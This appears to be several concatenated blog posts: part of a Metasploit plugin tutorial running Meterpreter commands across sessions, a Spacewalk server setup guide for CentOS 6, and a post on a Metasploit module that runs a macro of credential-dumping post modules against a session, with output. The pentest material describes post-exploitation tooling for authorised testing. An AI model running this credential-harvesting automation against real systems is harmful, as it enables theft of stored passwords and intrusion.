          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1567 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1567 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2116526 (2.0 MiB)  TX bytes:2116526 (2.0 MiB)

sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

For running Meterpreter console commands the multimetercmd command is available it will check if the session specified is a Meterpreter session or not before executing, there is also a resource driven version of the command also:

msf > multi_meter_cmd  -h

OPTIONS:

    -h        Command Help
    -c <opt>  Meterpreter Console Command to run against sessions.
    -s <opt>  Sessions to run Meterpreter Console Command against. Example <all> or <1,2,3,4>

Lets run sysinfo against all sessions:

msf > multi_meter_cmd  -s all -c sysinfo
Running command sysinfo against session 2
Computer        : CARLOS-192FCD91
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Running command sysinfo against session 3
Computer        : TEST-01BCDAF47C
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Running command sysinfo against session 4
Session 5 is not a Meterpreter session!
Session 6 is not a Meterpreter session!
Session 7 is not a Meterpreter session!

As it can be seen the plugin provide many manners to automate post-exploitation tasks during a pentest. As always I hope you find it useful and would love your feedback and any bug report for bugs found.

SpaceWalk is the upstream open source project for the Red Hat Satellite Server for system management. The project is licensed under the GPLv2. The main function of the project is software content management for Red Hat derived distributions such as Fedora, CentOS, and Scientific Linux in your environment. Debian and Solaris support are in experimental mode at the moment. It also allows us to kickstart systems, as well as manage and deploy configuration files. Spacewalk's monitoring feature allow us to view monitoring status for your systems alongside their software update status. Spacewalk also has virtualization capabilities to enable us to provision, control, manage, and monitor virtual Xen guests.It also provides a proxy server for synching files to geographically distributed sites from a central location. This blog post will cover the basic setup of the server and the software channels to start managing software updates in a CentOS environment.

Configuring the Environment for Installing Spacewalk

Test that name resolution is working properly.

ping -c 3 `hostname`

The pings should be successful.

Install the spacewalk repository so it will be available when using yum for installing packages:

rpm -Uvh http://spacewalk.redhat.com/yum/1.5/RHEL/6/x86_64/spacewalk-repo-1.5-1.el6.noarch.rpm

Set the jpackage repository, specifically for version 5.0

cat > /etc/yum.repos.d/jpackage-generic.repo << EOF
[jpackage-generic]
name=JPackage generic
#baseurl=http://mirrors.dotsrc.org/pub/jpackage/5.0/generic/free/
mirrorlist=http://www.jpackage.org/mirrorlist.php?dist=generic&type=free&release=5.0
enabled=1
gpgcheck=1
gpgkey=http://www.jpackage.org/jpackage.asc
EOF

For CentOS 6 there is a specific version of selinux that is needed so the CR(Continous Release) Repository must be used

cat > /etc/yum.repos.d/cr.repo << EOF
[CR-repository]
name=CR Repository
baseurl=http://mirror.centos.org/centos/\$releasever/cr/\$basearch/
enabled=1
gpgcheck=1
EOF

Spacewalk requires a Java Virtual Machine with version 1.6.0 or greater. The EPEL Repository contains a version of the openjdk that works with Spacewalk. Other dependencies can get installed from EPEL as well. To get packages from EPEL just install this RPM:

rpm -Uvh http://download.fedora.redhat.com/pub/epel/6/i386/epel-release-6-5.noarch.rpm

At the time of this writing there is a bug with cobbler-web being installed in a Spacewalk server so to make sure it does not get installed it is set as an excluded package in the yum.conf file:

echo "exclude=cobbler-web" >> /etc/yum.conf

Installing Spacewalk

The version of Spacewalk we will be installing is the PostgreSQL version. For this we will need to install PostgreSQL Server and configure it.

Installing and Configuring PostgreSQL

We will use yum to install the database server:

yum install postgresql-server

Initialize the system master database:

service postgresql initdb

Start the service so we can connect to the server and configure it:

service postgresql start

Ensure that PostgresSQL server will start with the server when it is rebooted:

 chkconfig postgresql on

Create database, user, and plpgsql language there (Change the password variable to a secure one):

su - postgres -c 'PGPASSWORD=spacepw; createdb spaceschema ; createlang plpgsql spaceschema ; yes $PGPASSWORD | createuser -P -sDR spaceuser'

We configure the user to use md5 password to connect to that database. Put the lines like following to /var/lib/pgsql/data/pg_hba.conf before the all statements

local spaceschema spaceuser md5
host  spaceschema spaceuser 127.0.0.1/8 md5
host  spaceschema spaceuser ::1/128 md5

Then we reload PostgreSQL:

service postgresql reload

Configuring Firewall

We must configure the system firewall to allow connection to the necessary ports used by the different services used by Spacewalk.

• Port 80 and 443 for connection to Web Interface and client connections to the server.
• port 4545 for Spacewalk monitoring
• Port 5222 for push actions to client machines.
• Port 5269 for push actions to a Spacewalk Proxy.
• Port 69 UDP for TFTP if provisioning will be used.

The commands to configure the firewall are:

iptables -D INPUT -j REJECT --reject-with icmp-host-prohibited
iptables -A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 4545 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 5222 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 5269 -j ACCEPT
iptables -A INPUT -p tcp -m udp --dport 69 -j ACCEPT
iptables -A INPUT -j REJECT --reject-with icmp-host-prohibited
service iptables save
service iptables restart

Installing the Spacewalk Package

Once all dependencies have been configured we can install the spacewalk package issuing the yum command to install the PostgreSQL version, during installation we will have to accept several GPG keys for the repositories that where configured to meet the dependencies:

yum -y install spacewalk-postgresql

Initial Spacewalk Configuration

The best way to configure spacewalk is thru the use of a configuration file. The following is an example that can be modified for initial configuration (Make the necessary changes for your environment):

admin-email = root@localhost
ssl-set-org = Spacewalk Org
ssl-set-org-unit = spacewalk
ssl-set-city = My City
ssl-set-state = My State
ssl-set-country = US
ssl-password = spacewalk
ssl-set-email = root@localhost
ssl-config-sslvhost = Y
db-backend=postgresql
db-name=spaceschema
db-user=spaceuser
db-password=spacepw
db-host=localhost
db-port=5432
enable-tftp=Y

Connect to the server to create the administrator account for the default organization.

Use Firefox, for some reason Internet Explorer and Google Chrome have problems when login in to the server with the created administrator account for the first time.

After we have created this account, the server is ready to be used for administering hosts.

Setting Software Channels

Once the first organization is created one can decide on a model of a centralized or decentralized organization. Red Hat has a great white paper for this RHN SATELLITE: BEST PRACTICES FOR MULTIPLE ORGANIZATIONS

The first step is to set a Base channel this channel will contain all base packages for a system. The first Base Channel that we will set will be the one for CentOS 6.0 the version of CentOS used for the Spacewalk Server. Follow this steps one logged in:

1. Click on Channels
2. Click on Manage Software Channels
3. Click on Manage Repositories
4. Click on Create New Repository

GPG Key import

Before we start one thing to alway keep in mind is that the Spacewalk Server will not deploy packages from any repository for which it does not have the GPG Public key used to sign the packages. These keys are placed in the root of the version of the repository that one will use. First we need to download these keys import them so as to get the key ID and Fingerprint for when setting the channel and they should also be imported using rpm on the Spacewalk server. For the base CentOS repository we download the keys to import them with GPG to get the key information:

mkdir repo_keys
cd repo_keys
curl -O http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6

Now that we have the key imported we can use the ID shown in the output to list the key fingerprint to add to the channel definition, also it is advised that we do an import from rpm. Create one channel per set of repositories so it is easier to manage the key:

gpg --list-keys --fingerprint C105B9DE
rpm --import http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6

We will follow these steps for the creation of all repositories for which we will crate a channel of.

Creating Repositories

We will create 2 Repositories for CentOS 6 the first one will be the base repository for CentOS the second will be the Updates. For the base system repository enter:

• Repository Labe - CentOS6-i386-Base
• Repository URL - http://mirror.facebook.net/centos/6/os/i386/
• Then click on Create Repository

For the updates repository enter:

• Repository Labe - CentOS6-i386-Updates
• Repository URL - http://mirror.facebook.net/centos/6/updates/i386/
• Then click on Create Repository

For the Spacewalk Client repository enter:

• Repository Labe - spacewalk-client-rhel6-i386
• Repository URL - http://spacewalk.redhat.com/yum/1.5/RHEL/6/i386/
• Then click on Create Repository

Lets create a repository for VMWare Tools for vSphere 5 if you are using VMWare for running Virtual Machines:

• Repository Labe - VMware-Tools-ESX-5.0-RHL6
• Repository URL - http://packages.vmware.com/tools/esx/5.0/rhel6/i386/index.html
• Then click on Create Repository

Creating Channels

We will create a new channel that will use both Repositories:

1. Click on Channels
2. Click on Manage Software Channels
3. Click on Create New Channel

Enter the Following Parameters:

• Channel Name - CentOS 6 32-bit
• Channel Label - centos6-i386
• Parent Channel - none
• Parent Channel Architecture - IA-33
• Yum Repository Checksum Type - sha256
• Channel Summary - 32-bit CentOS 6 channel
• Under Channel Access Control Select:
  • All users within your organization may subscribe to this channel.
  • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
• GPG key URL - http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6
• GPG key ID - C105B9DE
• GPG key Fingerprint - C1DA C52D 1664 E8A4 386D BA43 0946 FCA2 C105 B9DE
• Click on Create Channel

Assign the Repositories to the Channel:

• Click on Channels
• Click on Manage Software Channels
• Click on the name of the channel that was just created
• Click on Repositories
• Select the Repositories to be linked to the channel (CentOS6-i386-Base and CentOS6-i386-Updates)
• Click on Update Repositories

To Sync the repositories

• Click on Repositories under in the channel settings
• Click on Sync
• Click on Sync Now to start the synching process
• Select a scheduling option and interval and click on Schedule

The initial sync can take hours depending on the size of the repository and internet connection speed. Packages will begin to appear slowly on the channel package list as they are downloaded and synched.

Repeat the steps for the Spacewalk Client and the VMware Tools using the settings shown bellow.

SpaceWalk Client:

• Channel Name - Spacewalk Client 32bit RHL6
• Channel Label - spacewalk-client-32bit-rhl6
• Parent Channel - CentOS 6 32-bit
• Parent Channel Architecture - IA-33
• Yum Repository Checksum Type - sha1
• Channel Summary - Spacewalk Client 32bit for RHL6
• Under Channel Access Control Select:
  • All users within your organization may subscribe to this channel.
  • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
• GPG key URL - http://spacewalk.redhat.com/yum/RPM-GPG-KEY-spacewalk
• GPG key ID - 430A1C35
• GPG key Fingerprint - B6F4 CBE4 8B8F 45E1 85F8 34B2 9542 3D4E 430A 1C35

Assign the repository spacewalk-client-rhel6-i386 to the channel and set a sync schedule

VMWare Tools:

• Channel Name - VMware Tools RHL6 32bit ESX5
• Channel Label - rhl6-vm-32bit-esx5
• Parent Channel - CentOS 6 32-bit
• Parent Channel Architecture - IA-33
• Yum Repository Checksum Type - sha1
• Channel Summary - VMware Tools RHL6 32bit ESX5
• Under Channel Access Control Select:
  • All users within your organization may subscribe to this channel.
  • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
• GPG key URL - http://packages.vmware.com/tools/VMWARE-PACKAGING-GPG-KEY.pub
• GPG key ID - 66FD4949
• GPG key Fingerprint - 36E4 7E1C C4DC C5E8 152D 115C C0B5 E0AB 66FD 4949

Assign the repository Vmware-Tools-ESX-5.0-RHL6 to the channel and set a sync schedule

For more information on creating repos and synching them do take a look at: Uploading Content

Enable the OSA Dispatcher so we can push jobs imediatly to registered systems:

chkconfig osa-dispatcher on
service osa-dispatcher start

Connecting a CentOS 6 System

Before connecting to a CentOS 6 System you need to create an activation key to use for registering the systems and assign a software channel to it. To create an Activation Key we do the following:

• Click on Systems
• Click on Activation Keys
• Click on Create New Key
• Enter the Following Information
  • Description - CentOS 6 i386 Systems
  • key - centos6-32bit
  • Base Channels - *CentOS 6 32-bit *
  • Add-On Entitlements - Select Monitoring and Provisioning (You can also choose the Virtualization Entitlements if you wish to use them)
• Click on Create Activation Key

The key is now ready to use.

To connect the system the appropriate client software must be installed on the system

We start by installing the appropriate repository for the spacewalk client software:

rpm -Uvh http://spacewalk.redhat.com/yum/1.5/RHEL/6/i386/spacewalk-client-repo-1.5-1.el6.noarch.rpm
rpm -Uvh http://download.fedora.redhat.com/pub/epel/6/i386/epel-release-6-5.noarch.rpm

Install the necessary client software:

yum install rhn-client-tools rhn-check rhn-setup rhnsd m2crypto yum-rhn-plugin osad

We can register the CentOS system to Spacewalk using the activation key we created earlier:

rhnreg_ks --serverUrl=http://YourSpacewalk.example.org/XMLRPC --activationkey=1-centos6-32bit

We need to configure OSAD so we can push actions to this system, we start by downloading the certificate and setting the certificate in the configuration file for OSAD:

cd /usr/share/rhn/
curl -O http://yourspacewalk.example.org/pub/RHN-ORG-TRUSTED-SSL-CERT
/usr/bin/perl -p -i -e "s/osa_ssl_cert =/osa_ssl_cert = \/usr\/share\/rhn\/RHN-ORG-TRUSTED-SSL-CERT/g" /etc/sysconfig/rhn/osad.conf

We can now set the service:

chkconfig osad on
service osad start

For information on connecting other systems do take a loot at Registering Clients

Caveats

At the moment of this writing in version 1.5 of Spacewalk Errata is only imported from Fedora Channels and not all errata is process. CentOS has not distributed any errata for the version 6.x of CentOS so automating the import of errata is not possible. For previous versions of CentOS the following blog post Blog shows a way to automate the import of the errata information.

A Module I wrote to simplify the running of multiple post modules against a session for users that did not want to learn how to code ruby or wanted to learn the API to build a resource file to achieve this could use something simpler for them to achieve this task. The module is called multi_post. Lets load the module and see the options it has:

msf > use post/multi/manage/multi_post 
msf  post(multi_post) > info

       Name: Multi Manage Post Module Macro Execution
     Module: post/multi/manage/multi_post
    Version: 14287
   Platform: Windows, Unix, OSX, Linux, Solaris
       Arch: 
       Rank: Normal

Provided by:
  carlos_perez <carlos_perez@darkoperator.com>

Description:
  This module will execute a list of modules given in a macro file in 
  the format of < module > < opt=val,opt=val > against the select session 
  checking for compatibility of the module against the sessions and 
  validation of the options provided.


msf  post(multi_post) > show options 

Module options (post/multi/manage/multi_post):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   MACRO                     yes       File with Post Modules and Options to run in the session
   SESSION                   yes       The session to run this module on.

As we can see it takes a macro file where each post module and its options are written one per line in the format of < module > < opt=val,opt=val > lets create a macro for running all password dumping credentials. The Macro would look something like this:

post/windows/gather/credentials/wsftp_client
post/windows/gather/credentials/winscp
post/windows/gather/credentials/windows_autologin
post/windows/gather/credentials/vnc
post/windows/gather/credentials/trillian
post/windows/gather/credentials/total_commander
post/windows/gather/credentials/smartftp
post/windows/gather/credentials/outlook
post/windows/gather/credentials/nimbuzz
post/windows/gather/credentials/mremote
post/windows/gather/credentials/imail
post/windows/gather/credentials/idm
post/windows/gather/credentials/flashfxp
post/windows/gather/credentials/filezilla_server
post/windows/gather/credentials/meebo
post/windows/gather/credentials/coreftp
post/windows/gather/credentials/imvu
post/windows/gather/credentials/epo_sql
post/windows/gather/enum_ie
post/multi/gather/ssh_creds
post/multi/gather/pidgin_cred
post/multi/gather/firefox_creds
post/multi/gather/filezilla_client_cred

Now we save the file as cred_dump.rc and so we can use it in the module:

msf  post(multi_post) > set MACRO /Users/carlos/cred_dump.rc
MACRO => /Users/carlos/cred_dump.rc
msf  post(multi_post) > set SESSION 1
SESSION => 1
msf  post(multi_post) > run

[*] Running module against WIN2K8R2-01
Loading post/windows/gather/credentials/wsftp_client
Running Against 1
[*] Checking Default Locations...
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....
Loading post/windows/gather/credentials/winscp
Running Against 1
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!
Loading post/windows/gather/credentials/windows_autologin
Running Against 1
[*] Running against WIN2K8R2-01 on session 1
[-] Post failed: NameError undefined local variable or method `d02' for #<#<Module:0x007fc88b0c0e78>::Metasploit3:0x007fc88fd80898>
[-] Call stack:
[-]   /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/windows_autologin.rb:95:in `run'
Loading post/windows/gather/credentials/vnc
Running Against 1
[*] Enumerating VNC passwords on WIN2K8R2-01
[*] Checking UltraVNC...
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[*] Checking TightVNC_HKLM_Control_pass...
[*] Checking RealVNC_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC4_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500...

. . . . . .

[*] Checking for Firefox directory in: C:\Users\Administrator\AppData\Roaming\Mozilla\
[-] Firefox not found
Loading post/multi/gather/filezilla_client_cred
Running Against 1
[*] Checking for Filezilla directory in: C:\Users\Administrator\AppData\Roaming
[*] No users found with a FileZilla directory
[*] Post module execution completed
msf  post(multi_post) >

As we can see this can be helpful if one wants to create quick macro files to run collections of post modules and use them in automated fashion like with AutoRunScript for when running exploits or setting a multi handler.

As always I hope you find this information useful.